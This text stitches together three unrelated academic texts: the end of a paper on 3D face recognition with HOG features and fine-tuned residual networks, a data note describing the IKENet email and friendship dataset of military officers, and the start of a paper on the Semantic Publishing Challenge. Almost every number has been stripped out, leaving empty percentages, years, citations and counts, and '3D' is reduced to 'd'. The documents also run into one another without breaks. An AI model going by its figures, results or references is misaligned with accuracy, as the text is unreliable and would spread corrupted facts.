in previous research, the custom cnn is a commonly used deep learning algorithm for d image recognition tasks. first, custom cnn training requires constantly adjusting the network parameters; customizing parameters such as weights and biases leads to very slow convergence, greatly increasing the training time and the number of epochs (hu et al., ; sharma & shaik, ). in addition, when the dimensionality increases with the volume of data, the curse of dimensionality causes a drop in the performance of the classifier (soltanpour & jonathan wu, ). the fine-tuning method speeds up convergence and shortens the training period, and is therefore well suited to d processing. the purpose of multi-layer convolution is that the features acquired through a single convolution layer are often local; the more layers there are, the more global the acquired features become. maintaining good performance while improving accuracy is thus a key issue in large-scale d face recognition scenarios. therefore, a fine-tuned deep residual network based on hog features is proposed to address the problem of large-scale d face recognition effectively.
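the preprocessing pipeline discussed above (detection and alignment of the raw d face textures, hog extraction, and resizing to the network input size) can be sketched as follows. the hog parameters and the target image size are illustrative assumptions, since the paper's custom parameter values are not reproduced in this text.

```python
# illustrative sketch of the hog preprocessing step; the hog parameters and the
# target size are assumptions, not the paper's exact settings.
import numpy as np
from skimage import io, transform
from skimage.feature import hog

def hog_feature_image(path, out_size=(224, 224)):
    """load an already detected and aligned face texture and return its hog image."""
    face = io.imread(path, as_gray=True)
    face = transform.resize(face, out_size, anti_aliasing=True)
    _, hog_image = hog(face,
                       orientations=9,
                       pixels_per_cell=(8, 8),
                       cells_per_block=(2, 2),
                       visualize=True)
    # replicate to three channels so the result matches an rgb-shaped resnet input
    return np.stack([hog_image] * 3, axis=-1)
```

a pre-trained resnet could then be fine-tuned on such hog images, for example by replacing its final fully connected layer with one sized to the number of identities in the gallery.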
to the best of our knowledge, our work is among the first to examine a fine-tuned deep residual network model on the recognition task of the frgc-v dataset. to increase accuracy during resnet training, several measures were taken in this paper: (1) a fine-tuned deep residual network was adopted, taking advantage of its intrinsic features, such as shortcut connections, weight sharing and pooling architectures, which can be strengthened by deepening the network structure; (2) the number of layers was carefully designed, with smaller filter sizes, to avoid overfitting while leaving sufficient capacity for the network to solve complex large-scale classification problems (hawkins, ; lawrence & lee giles, ); (3) feature extraction was performed via the hog method during image preprocessing, which yields higher discriminative features from the d images. as a result, the proposed method was well trained and yielded state-of-the-art classification accuracy.

conclusions

in this study, in-depth investigations were conducted on end-to-end d face texture recognition. we first review the previous studies on d face recognition and then summarize the critical research questions to be solved. the d face detection and alignment modules are implemented and flexibly applied to raw d face data, achieving a precision rate of . %. in addition, the detailed steps of the hog extraction pattern were presented. d face images with hog features can significantly reduce the descriptor size, lowering the computational load and economizing memory in the recognition process. we trained the fine-tuned resnet models combined with hog features; the discriminative power of the deeply learned features can greatly enhance recognition ability. this study implemented every important subcomponent, which can effectively reduce d image noise and greatly increase the robustness of the proposed recognition system. the experiments showed that the degradation problem was efficiently mitigated by increasing the number of layers in our fine-tuned resnet neural networks, which improves the recognition rate within a short time while the accuracy is maintained at a certain level.

however, although the algorithm performs adequately in practical applications, several aspects of the model should still be studied and improved. first, although the hog algorithm has the advantages of low calculation time and fast detection speed, when the pose of the d face changes drastically the target can be lost in the face image, which leads to low processing efficiency. the d face alignment could be preprocessed with a cnn-based detection method, and multi-processing or multi-threading could be used to speed up face alignment, ensuring that the preprocessing module can process data quickly. second, the recognition rate may be adversely affected under certain conditions. for instance, the resnet- model exhibited overfitting, in which the accuracy rate dropped and remained at around % after the th epoch. this phenomenon is caused by two conditions: too few data and the excessive complexity of the neural network model. it can be addressed in future work by increasing the amount of d face data via data augmentation methods (perez & wang, ; wong, gatt & stamatescu, ). this also shows that the resnet network has a more powerful data processing capability for large amounts of data.
overall, the development of large number d face recognition classification system is a challenging work, and there is still a long way to go to apply these theories and methods in large-scale scenes. the results suggest that fine-tuned deep residual networks classification approach based on hog features will be a promising direction to improve d face recognition rate. acknowledgements i am indebted to prof. rahmita wirza o.k. rahmat for assistance with data collection, providing helpful discussions of the d face analyses. i thank fatimah khalid for her help in the depth analysis and comments on the face recognition theory, as well as prof. dr. nurul amelina nasharuddin for fruitful advices. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • siming zheng conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • rahmita wirza o.k. rahmat conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft, checked the logic of this article. • fatimah khalid conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft, checked the fluency of this article. • nurul amelina nasharuddin analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, examined the experimental codes. data availability the following information was supplied regarding data availability: the raw data is available at zheng, siming ( ): -step-frgc -original-dataset-.zip. figshare. figure. doi: . /m .figshare. .v . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ahamed h, alam i, manirul islam md. . hog-cnn based real time face recog- nition. in: proc. international conference on advancement in electrical and electronic engineering (icaeee), vol. p- . – doi . /icaeee. . . bagchi p, bhattacharjee d, nasipuri m. . d face recognition using surface normal. in: tencon . piscataway: ieee doi . /tencon. . . baltrusaitis t, robinson p, morency l-p. . constrained local neural fields for ro- bust facial landmark detection in the wild. in: iccv. doi . /iccvw. . . baltrusaitis t, robinson p, morency l-p. . openface: an open source facial behavior analysis toolkit. in: ieee winter conference on applications of computer vision. doi . /wacv. . . chen z, wang j, he h, huang x. . a fast deep learning system using gpu. in: ieee international symposium on circuits and systems (iscas). piscataway: ieee doi . /iscas. . . cheng z, shi t, cui w, dong y, fang x. . d face recognition based on kinect depth data. in: th international conference on systems and informatics (icsai), vol. . – doi . /icsai. . . flynn p. . face recognition grand challenge biometrics database (v . ) license agree- ment. 
notre dame: university of notre dame doi . /m .figshare. . zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /icaeee. . http://dx.doi.org/ . /tencon. . http://dx.doi.org/ . /iccvw. . http://dx.doi.org/ . /wacv. . http://dx.doi.org/ . /iscas. . http://dx.doi.org/ . /icsai. . http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. fred a, agarap m. . deep learning using rectified linear units (relu). arxiv preprint. arxiv: . v : - . hanin b. . which neural net architectures give rise to exploding and vanishing gradients? in: nd conference on neural information processing systems (neurips), vol. . – . hawkins dm. . the problem of overfitting. journal of chemical information and computer sciences : – doi . /ci . he k, zhang x, ren s, sun j. . deep residual learning for image recognition. in: ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee doi . /cvpr. . . hu h, ali shah sa, bennamoun m, molton m. . d and d face recognition using convolutional neural network. in: tencon . piscataway: ieee doi . /tencon. . . huang y-b, li k, wang g, cao m, li p, zhang y-j. . recognition of convolutional neural network based on cuda technology. arxiv preprint. arxiv: ( ) - . ioffe s, szegedy c. . batch normalization: accelerating deep network training by reducing internal covariate shift. international conference on machine learning : – . jourabloo a, liu x. . pose-invariant d face alignment. in: ieee international con- ference on computer vision (iccv). piscataway: ieee doi . /iccv. . . jung h, lee s, yim j, park s, kim j. . joint fine-tuning in deep neural networks for facial expression recognition. in: ieee international conference on computer vision (iccv). piscataway: ieee doi . /iccv. . . kamencay p, benco m, mizdos t, radil r. . a new method for face recognition using convolutional neural network. digital image processing and computer graphic : – . kim d, hernandez m, choi j, medioni g. . deep d face identification. in: ieee international joint conference on biometrics (ijcb). piscataway: ieee doi . /btas. . . kumar p, happy sl, routray a. . a real-time robust facial expression recognition system using hog features. in: international conference on computing, analytics and security trends. doi . /cast. . . lawrence s, lee giles c. . overfitting and neural networks: conjugate gradient and backpropagation. in: ijcnn. doi . /ijcnn. . . lecun y, boser b, denker js, henderson d, howard re, hubbard w, jackel ld. . backpropagation applied to handwritten zip code recognition. neural computation : – doi . /neco. . . . . maiti s, sangwan d, raheja jl. . expression-invariant d face recognition using k-svd method. applied algorithms : – . min r, choi j, medioni g, dugelay j-l. . real-time d face identification from a depth camera. in: icpr. doi . /crv. . . zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . v : - http://dx.doi.org/ . /ci http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . /tencon. . http://arxiv.org/abs/ ( ) - http://arxiv.org/abs/ ( ) - http://dx.doi.org/ . /iccv. . http://dx.doi.org/ . /iccv. . http://dx.doi.org/ . /btas. . http://dx.doi.org/ . /cast. . http://dx.doi.org/ . /ijcnn. . http://dx.doi.org/ . /neco. . . . http://dx.doi.org/ . /crv. . http://dx.doi.org/ . /peerj-cs. nagi gm, rahmat r, taufik m, khalid f. 
. multimodal d- d face recognition. international journal of future computer and communication ( ): – doi . /ijfcc. .v . . pabiasz s, starczewski jt, marvuglia a. . som vs fcm vs pca in d face recogni- tion. artificial intelligence and soft computing : – doi . / - - - - _ . pascanu r, mikolov t, bengio y. . understanding the exploding gradient problem. arxiv preprint. arxiv: . v : - . perez l, wang j. . the effectiveness of data augmentation in image classification using deep learning. arxiv preprint. arxiv: ( ) - . phillips pj, flynn pj, scruggs t, bowyer kw, chang j, hoffman k, marques j, min j, worek w. . overview of the face recognition grand challenge. in: cvpr. doi . /cvpr. . . porro-munoz d, silva-mata fj, revilla-eng a, talavera-bustamante i, berretti s. . d face recognition by functional data analysis. progress in pattern recognition, image analysis, computer vision, and applications : – . santosh dadi h, mohan pillutla gk. . improved face recognition rate using hog features and svm classifier. iosr journal of electronics and communication engineering : – doi . / - . sharma s, shaik s. . real time face authentication using convolutional neural net- work. in: international conference on signal processing (icsp) doi . /cp. . . simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. in: rd iapr asian conference on pattern recognition (acpr). doi . /acpr. . . singh g, chhabra i. . effective and fast face recognition system using complemen- tary oclbp and hog feature descriptors with svm classifier. journal of information technology research : – . singh s, paul a, dr. arun m. . parallelization of digit recognition system using deep convolutional neural network on cuda. in: third international conference on sensing, signal processing and security (icsss). doi . /ssps. . . soltanpour s, jonathan wu qm. . high-order local normal derivative pattern (lndp) for d face recognition. in: ieee international conference on image processing (icip). piscataway: ieee doi . /icip. . . song a, li l, atalla c, cottrell gw. . learning to see faces like humans: modeling the social dimensions of faces. journal of vision ( ): doi . / . . . sun y, liang d, wang x, tang x. . deepid : face recognition with very deep neural networks. arxiv preprint. arxiv: . v : - . szegedy c, liu w, jia y, sermanet p, reed s, anguelov d, erhan d, vanhoucke v, ra- binovich a. . going deeper with convolutions. in: ieee conference on com- puter vision and pattern recognition. piscataway: ieee doi . /cvpr. . . tang h, yin b, sun y, hu y. . d face recognition using local binary patterns. signal processing ( ): – doi . /j.sigpro. . . . zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ijfcc. .v . http://dx.doi.org/ . / - - - - _ http://arxiv.org/abs/ . v : - http://arxiv.org/abs/ ( ) - http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . / - http://dx.doi.org/ . /cp. . http://dx.doi.org/ . /acpr. . http://dx.doi.org/ . /ssps. . http://dx.doi.org/ . /icip. . http://dx.doi.org/ . / . . http://arxiv.org/abs/ . v : - http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . /j.sigpro. . . http://dx.doi.org/ . /peerj-cs. wang x, ruan q, jin y, an g. . d face recognition using closest point coordinates and spherical vector norms. in: icwmmn. doi . /cp. . . wong sc, gatt a, stamatescu v. . understanding data augmentation for classifica- tion: when to warp? ieee : – doi . /dicta. . . wu z, hou z, zhang j. . 
research on the d face recognition based on multi- class classifier with depth and point cloud data. in: ieee advanced information management, communicates, electronic and automation control conference (imcec), vol. . piscataway: ieee, – doi . /imcec. . . yosinski j, clune j, bengio y, lipson h. . how transferable are features in deep neural networks? in: the th international conference on neural information processing systems, vol. . – . zeiler md, fergus r. . visualizing and understanding convolutional neural networks. in: eccv lncs, . – . zhang d, zhang m, liu y. . three dimension face recognition based on gabor trans- formation and support vector machine. journal of applied science and engineering ( ): . zhang j, hou z, wu z, chen y, li w. . research of d face recognition algo- rithm based on deep learning stacked denoising autoencoder theory. in: iccsn. doi . /iccsn. . . zhu x, liu x, lei z, li sz. . face alignment in full pose range: a d total solution. arxiv preprint. arxiv: . v : - . zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /cp. . http://dx.doi.org/ . /dicta. . http://dx.doi.org/ . /imcec. . http://dx.doi.org/ . /iccsn. . http://arxiv.org/abs/ . v : - http://dx.doi.org/ . /peerj-cs. none microsoft word - volume _final insna.org | issues & | volume | ikenet: email and friendship evolution ian mcculloh abstract network evolution is an important problem for social scientists, management consultants, and social network scholars. unfortunately, few empirical data sets exist that have sufficient data to fully explore evolution dynamics. increasingly, more and more online data sets are used in lieu of offline, face-to-face data. the veracities of these findings are questionable, however, because there are few studies exploring the similarity of online-offline dynamics. the ikenet project investigated online and offline network evolution. empirical data was collected on a group of mid-career military officers going through a one-year graduate program. data collection included email communication collected from the exchange server, as well as self- reported friendship, and time spent together, over a course of weeks. numerous attribute data on the individual actors was collected from their military personnel files. the data allows network scholars to conduct research into the dynamics of network evolution and allows edu- cators a real-world example data set for use in classroom instruction. author ian mcculloh holds joint appointments as a parson’s fellow in the bloomberg school of public health, a senior lecturer in the whiting school of engineering and a senior scientist at the applied physics lab, at johns hopkins university. he is the chief technology officer for arrow analytics, a management and neural marketing consulting firm. his current research is focused on strategic influence in online networks. his most recent papers have been focused on the neuroscience of persuasion and measuring influence in online social media firestorms. he is the author of “social network analysis with applications” (wiley: ), “networks over time” (oxford: forthcoming) and has published peer-reviewed papers, primarily in the area of social network analysis. he retired as a lieutenant colonel from the us army after years of service in special operations and improvised explosive device forensics. he founded the west point network science center and created the army’s advanced network analysis and targeting (anat) program. 
please send all correspondence to imccull @jhu.edu connections ikenet: email and friendship evolution | volume | issues & | insna.org . overview the ikenet data is from one year of a five- year strategic study of social networks among mid-career military officers admit- ted to a one-year graduate program run jointly by columbia university and the u.s. military academy at west point. most of these students/officers serve for two to three years as tactical officers at west point following completion of their master’s degree program. tactical officers are responsible for overseeing the cadet chain of command at the u.s. military academy and for providing the primary leadership training for cadets. this data focuses on friendship formation and evolution during the first weeks of their program. the stu- dents/officers were recruited for this study on the first morning of their graduate pro- gram, prior to meeting other participants for the first time, although some subjects may have had random interaction with each other in the past. the first network survey was collected during that morning, and then weekly for the following time pe- riods. one subject out of chose not to participate in this study. the response rate on self-reported survey data among the participants was %, which creates a % overall response rate. email data was cap- tured at the exchange server, therefore that response rate is %. this presents a unique data set for exploration of friend- ship formation, multi-level network analy- sis, longitudinal network analysis, and comparison between email and face-to- face networks. . data collection social network data was collected on a group of mid-career officers in the u.s. military. the officers were all enrolled in the eisenhower leadership development program (eldp) where they complete a one-year graduate program administered jointly by columbia university and the u.s. military academy. social networks included self-reported friendship, time spent together, and email communication collected from the central email exchange server (ring et al., ). data was col- lected beginning on the first day that the officers reported for duty and met each other for the first time. they were all given blackberries that allowed them to be con- nected to their military email accounts to facilitate email communication for the purpose of the project. the specific year of this data is in- tentionally omitted to protect the privacy of the respondents. the “ikenet” project was conducted over five years from to . in this particular year, of of- ficers in the program consented to be par- ticipants in this project. all data from the non-consenting officer were removed to protect their privacy. the u.s. army and the west point institutional review boards approved this research. surveys were conducted on a week- ly schedule, collecting network data on friendship and time spent together for weeks. the boundary of the network was defined using a realist approach (wasser- man and faust, ; mcculloh et al., ). the boundaries in this experiment were the members of the eisenhower leadership development program (eldp). this group consisted of offic- ers. two of the officers were women and were men. one of the men was a u.s. coast guard officer, while the other of- ficers were in the u.s. army. there were caucasian officers to include the two women. three of the officers were black and one was asian. the ages of the offic- ers ranged from to , with most offic- ers aged . 
attribute data was collected on the participants from their officer record brief (orb). the orb contains a wealth of in- formation on the officers. six officers to include the two women were roman cath- olic. officers were of various protestant christian denominations. for the purpose of this study, they were coded as protestant. this decision was made, be- cause on military installations all protestant faiths meet in a non- ikenet: email and friendship evolution connections insna.org | issues & | volume | denominational protestant service, while roman catholics meet in a different ser- vice. therefore, it is likely that if protestant officers attend church, they are likely to attend the same church regardless of their specific denomination. one officer was buddhist, one had no preference re- ported for religion, and no data was availa- ble for the coast guard officer. several experiments have recently been run out of west point concerning the formation of email networks. two collec- tion methods identified include decentral- ized, client-side collection and a central- ized collection of messages from the mail server (ring et al., ). the ikenet stud- ies conducted at west point have demon- strated findings that favor a centralized da- ta collection method over a client-side method (mcculloh and ring, ). addi- tionally, research has been conducted on how to unobtrusively collect these net- works to reduce respondent burden (mcculloh and ring, ). the source and time of commission was also collected from the orb. nine of- ficers to include the two women were graduates of the u.s. military academy. the coast guard officer was a graduate of the coast guard academy. eight officers were commissioned through the reserve officer training corps (rotc) and the remaining three were commissioned through officer candidate school (ocs). the military tracks officer promotions and career management by year groups. there- fore, each officer’s year group was also recorded. one officer was commissioned in , in , seven in , one in , and the coast guard officer was commissioned in . another important attribute for so- cial interaction may be competence or ex- perience. the undergraduate grade point average (gpa) was collected for each of- ficer from his or her application to the graduate program. the gpa ranged from . to . with an average gpa of . and a standard deviation of . . for experi- ence, the number of months an officer spent in command was recorded from their orb. command is the “key developmental job” (kd) for a captain and is an experien- tial requirement that an officer must com- plete prior to being admitted into the eldp program. the only exception is for the coast guard officer who must meet different career milestones respective to his military branch of service. the maxi- mum time any officer spent in command was months and the minimum time was months. the average was . with a standard deviation of . . each week the officers completed two surveys: friendship and time spent to- gether. there was a % response rate among participants. with one out of of- ficers choosing not to participate, the over- all response rate was %. in the cases of non-response, the dyadic rating between the preceding and proceeding weeks did not change, so it was simple to interpolate the missing data. unfortunately, there was no indicator coded in the data for where this occurred. the missing data were ran- dom and believed to be due to oversight. 
given that the omission was not discovered for about a week and that the ratings for those omissions did not change, there was no attempt to go back to respondents to correct their responses.

the friendship survey question asked respondents, “please rate how well you like the other members of your eldp cohort according to the following scale:”. the scale was a seven-point likert scale; the response options, listed from the lowest to the highest coded rating exactly as shown to respondents, were:

- “i strongly dislike this person”
- “i do not care for this person”
- “i am neutral toward this person”
- “i like this person”
- “this person is one of my better friends at this duty station”
- “this person is one of my better friends overall”
- “i consider this person one of my closest friends”

the time spent together survey question asked respondents, “please rate the time you spend with the other members of your eldp cohort according to the following scale:”. the scale was again a seven-point likert scale, with the following response options from the lowest to the highest coded rating:

- “i avoid this person”
- “i associate with this person only for official business at work”
- “i socialize with this person at work”
- “i occasionally (monthly) get together with this person outside of work”
- “i regularly (weekly) get together with this person outside of work”
- “i regularly (weekly) spend time with this person at their/my home”
- “i go on pass/leave [vacation] with this person”

this project collected a rich group of networks surrounding mid-career army officers. three networks were collected from the participants: friendship, email, and time spent together. the friendship and time spent together networks were collected through questionnaires on a weekly basis. the email network was collected at the server level and captured only the header information of the emails (ring et al., ).

data files and formats

the data are provided as flat comma-separated value files. the file “attributes.csv” provides the attribute data. its columns correspond to different attributes and are described by the list below (column, attribute, description).
- a, long tour: number of overseas assignments the officer has had that exceed one year
- b, short tour: number of overseas assignments the officer has had that are one year or less
- c, commands: number of command assignments the officer has had
- d, birthplace: officer's state of birth
- e, branch: two-letter designation of the officer's career field
- f, cbt tour: number of combat deployments completed
- g, kids: number of children the officer lists as dependents
- h, cmdmos: number of months spent in command assignments
- i, comm: source of commission: united states military academy (usma), reserve officer training corps (rotc), or officer candidate school (ocs)
- j, followon: follow-on assignment after the officer finishes the program
- k, gpa: undergraduate gpa on the program application
- l, gre verbal: score on the graduate record exam from the application
- m, gre math: score on the graduate record exam from the application
- n, height: height, in inches
- o, hor: state listed as home of record
- p, lang: secondary language after english
- q, lang: tertiary language after english
- r, marital: marital status: single, married, or divorced
- s, opntour: number of operational deployments not classified as combat
- t, race: caucasian (c), black (b), and asian (a)
- u, religion: religion as reported in the personnel file
- v, rest tour: unknown; included in the personnel file
- w, sex: sex
- x, skill: additional skill identifier to denote certain skills used in assignment decisions, such as paratrooper or ranger
- y, skill: as above
- z, skill: as above
- aa, skill: as above
- ab, skill: as above
- ac, spousebirth: spouse's location of birth
- ad, state: state of residence on record for tax purposes
- ae, undergrad major: academic major studied in the undergraduate program
- af, undergrad school: name of the undergraduate academic institution
- ag, weight: officer's weight in pounds
- ah, yg: officer's year group, usually the year they commissioned

the email network data is contained in the files “email .csv”, “email .csv”, ..., “email .csv”, corresponding to weeks one through . each csv contains an adjacency matrix whose elements give the number of email messages sent from the row element to the column element. the ordering of the rows and columns is consistent with the ordering of attributes in the “attributes.csv” file and with the other adjacency matrices included.

the friendship network data is contained in the files “like .csv”, “like .csv”, ..., “like .csv”, corresponding to weeks one through . each csv contains an adjacency matrix whose elements give the friendship rating that the row element assigns to each column element. the rating follows the seven-point likert scale above. subjects do not rate themselves, so “ ” represents an n/a value. the ordering of the rows and columns is consistent with the ordering of attributes in the “attributes.csv” file and with the other adjacency matrices included.

the time spent together network data is contained in the files “time .csv”, “time .csv”, ..., “time .csv”, corresponding to weeks one through . each csv contains an adjacency matrix whose elements give the time-spent-together rating that the row element assigns to each column element. the rating follows the seven-point likert scale above. subjects do not rate themselves, so “ ” represents an n/a value. the ordering of the rows and columns is consistent with the ordering of attributes in the “attributes.csv” file and with the other adjacency matrices included.
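to make the file layout above concrete, the sketch below loads the weekly adjacency matrices into directed, weighted graphs and attaches the officer attributes to the nodes. the data directory, the assumption that the adjacency csv files contain no header row, and the number of weekly snapshots are placeholders, since those details are not reproduced in this text.

```python
# minimal sketch for loading the ikenet csv files described above; the paths,
# the no-header assumption and the number of weeks are placeholders.
import pandas as pd
import networkx as nx

DATA_DIR = "ikenet"   # assumed location of attributes.csv, email*.csv, like*.csv, time*.csv
N_WEEKS = 12          # placeholder; set to the actual number of weekly snapshots

attributes = pd.read_csv(f"{DATA_DIR}/attributes.csv")

def load_week(kind, week):
    """read one weekly adjacency matrix (kind in {'email', 'like', 'time'}) as a digraph."""
    matrix = pd.read_csv(f"{DATA_DIR}/{kind}{week}.csv", header=None).values
    graph = nx.from_numpy_array(matrix, create_using=nx.DiGraph)
    # attach officer attributes to the nodes, relying on the shared row/column ordering
    for node in graph.nodes:
        graph.nodes[node].update(attributes.iloc[node].to_dict())
    return graph

# usage: weekly email volume and network density over the study period
for week in range(1, N_WEEKS + 1):
    g = load_week("email", week)
    print(week, g.size(weight="weight"), nx.density(g))
```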
connections ikenet: email and friendship evolution | volume | issues & | insna.org . data details response rate % for email networks, collected at the central server % for self-reported survey networks % for attribute data, collected from personnel files non-respondent bias none. there was no dyadic change from the data collected in the pre- ceding and following time periods for the few cases of missing data, allowing easy interpolation of data theoretical grouping n/a publication using these data none to date data context friendship formation among a group of mid-career military officers in a one-year graduate school program respondents mid-career military officers in the eisenhower leadership develop- ment program of the us army and columbia university longitudinal the first weeks of the program. temporality multiple ties are recorded between actors on a weekly basis. assign- ment cycles typically involved major assignments due every other week. analytical or pedagogical utility  longitudinal network data with time periods  multi-level networks with three relations: self-reported friend- ship, self-reported time spent together, email  network evolution, capturing data as the actors meet for the first time  node and edge covariates known issues references mcculloh, i., armstrong, h. & johnson, a.n. ( ). social network analysis with applications. hobo- ken, nj: wiley. mcculloh, i. & ring, b. ( ). unobtrusive social network data from e-mail. in proceedings, th army science conference. orlando, fl. ring, b., henderson, s., & mcculloh, i. ( ). gath- ering and studying email traffic to understand social networks. in h.r. arabnia & r.r. hashe- mi (eds.), proceedings of the international conference on information & knowledge engi- neering (pp. - ). las vegas: csrea press. wasserman, s., & faust, k. ( ). social network analysis: methods and applications (vol. ). cambridge: cambridge university press. submitted july accepted december published january corresponding author anastasia dimou, anastasia.dimou@ugent.be academic editor ana maguitman additional information and declarations can be found on page doi . /peerj-cs. copyright dimou et al. distributed under creative commons cc-by . open access challenges as enablers for high quality linked data: insights from the semantic publishing challenge anastasia dimou , , sahar vahdati , angelo di iorio , christoph lange , , ruben verborgh , and erik mannens , faculty of engineering and architecture, ghent university, ghent, belgium imec, leuven, belgium department of intelligent systems, university of bonn, bonn, germany department of computer science and engineering, university of bologna, bologna, italy enterprise information systems, fraunhofer iais, sankt augustin, germany abstract while most challenges organized so far in the semantic web domain are focused on comparing tools with respect to different criteria such as their features and competencies, or exploiting semantically enriched data, the semantic web evaluation challenges series, co-located with the eswc semantic web conference, aims to compare them based on their output, namely the produced dataset. the semantic publishing challenge is one of these challenges. its goal is to involve participants in extracting data from heterogeneous sources on scholarly publications, and producing linked data that can be exploited by the community itself. 
this paper reviews lessons learned from both (i) the overall organization of the semantic publishing challenge, regarding the definition of the tasks, building the input dataset and forming the evaluation, and (ii) the results produced by the participants, regarding the proposed approaches, the used tools, the preferred vocabularies and the results produced in the three editions of , and . we compared these lessons to other semantic web evaluation challenges. in this paper, we (i) distill best practices for organizing such challenges that could be applied to similar events, and (ii) report observations on linked data publishing derived from the submitted solutions. we conclude that higher quality may be achieved when linked data is produced as a result of a challenge, because the competition becomes an incentive, while solutions become better with respect to linked data publishing best practices when they are evaluated against the rules of the challenge. subjects data science, digital libraries, emerging technologies, world wide web and web science keywords linked data, semantic web, linked data publishing, semantic publishing, challenge, survey introduction the semantic web aims to extend the human-readable web by encoding the semantics of resources in a machine-comprehensible and reusable fashion. over the past years, a growing amount of research on publishing and consuming linked data, i.e., data represented and made available in a way that maximizes reusability, has facilitated semantic web adoption. however, one of the remaining issues is lack of high quality linked how to cite this article dimou et al. ( ), challenges as enablers for high quality linked data: insights from the semantic publishing challenge. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:anastasia.dimou@ugent.be https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. data. a promising means to foster and accelerate the publication of such high quality linked data is the organization of challenges: competitions during which participants complete tasks with innovative solutions that are then ranked in an objective way to determine the winner. a significant number of challenges has been organized so far, including the semantic web challenge (see http://challenge.semanticweb.org/), its big data track formerly known as the billion triples challenge, and the linkedup challenge (http://linkedup-challenge.org/), to mention a few of the longest lasting. however, these challenges targeted broad application domains and were more focused on innovative ways of exploiting semantic web enabled tools (linked data consumption) than on the output actually produced (linked data production). therefore, such challenges enable advancement of semantic web technology but overlook the possibility of also advancing linked datasets per se. this paper focuses on a series of challenges in the semantic publishing domain. semantic publishing is defined as ‘‘the enhancement of scholarly publications by the use of modern web standards to improve interactivity, openness and usability, including the use of ontologies to encode rich semantics in the form of machine-readable rdf metadata’’ by shotton ( ). 
the semantic publishing challenge, was themed ‘‘assessing the quality of scientific output’’ (lange & di iorio, ) ( sempub challenge, http: // .eswc-conferences.org/semantic-publishing-challenge.html), in we mentioned the techniques more explicitly by appending ‘‘... by information extraction and inter- linking’’ (di iorio et al., ) ( sempub challenge, http:// .eswc-conferences. org/important-dates/call-sempub), and in we generalized to ‘‘... in its ecosystem’’ to emphasize the multiple dimensions of scientific quality and the potential impact of producing linked data about it (dimou et al., ) ( sempub challenge, http: // .eswc-conferences.org/assessing-quality-scientific-output-its-ecosystem). according to miller & mork ( ), extracting, annotating and sharing scientific data (by which, here, we mean standalone research datasets, data inside documents, as well as metadata about datasets and documents) and then building new research efforts on them, can lead to a data value chain producing value for the scholar and semantic web community. on the one hand, the scholar community benefits from a challenge that produces data, as the challenge results in more data and in data of higher quality being available to the community to exploit. on the other hand, the semantic web community benefits: participants optimize their tools towards performance in this particular challenge, but such optimisations may also improve the tools in general. once such tools are reused, any other dataset benefits from their advancements, because the processes producing them has been improved. however, bootstrapping and enabling such value chains is not easy. in a recent publication (vahdati et al., ), we discussed lessons we learned from our experience in organizing the first two editions of the semantic publishing challenge— mainly from the perspective of how to improve the organization of further editions and of providing a better service to the scholar community. the lessons are related to the challenge organization, namely defining the tasks, building the input datasets and performing the dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://challenge.semanticweb.org/ http://linkedup-challenge.org/ http:// .eswc-conferences.org/semantic-publishing-challenge.html http:// .eswc-conferences.org/semantic-publishing-challenge.html http:// .eswc-conferences.org/important-dates/call-sempub http:// .eswc-conferences.org/important-dates/call-sempub http:// .eswc-conferences.org/assessing-quality-scientific-output-its-ecosystem http:// .eswc-conferences.org/assessing-quality-scientific-output-its-ecosystem http://dx.doi.org/ . /peerj-cs. evaluation, as well as lessons we learned by studying the solutions, with respect to the methodologies, tools and ontologies used, and data produced by the participants. we organized the third edition based on these lessons learned. in this paper, we revise our lessons learned, taking into consideration experience gained by organizing the challenge’s third edition, whose results validate in principle our lessons learned. we argue that challenges may act as enablers for the generation of higher quality linked data, because of the competitive aspect. however, organizing a successful challenge is not an easy task. therefore, the goal of this paper is to distill generic best practices, which could be applied to similar events, rendering the challenge tasks into meaningful milestones for efficient linked data generation and publishing. 
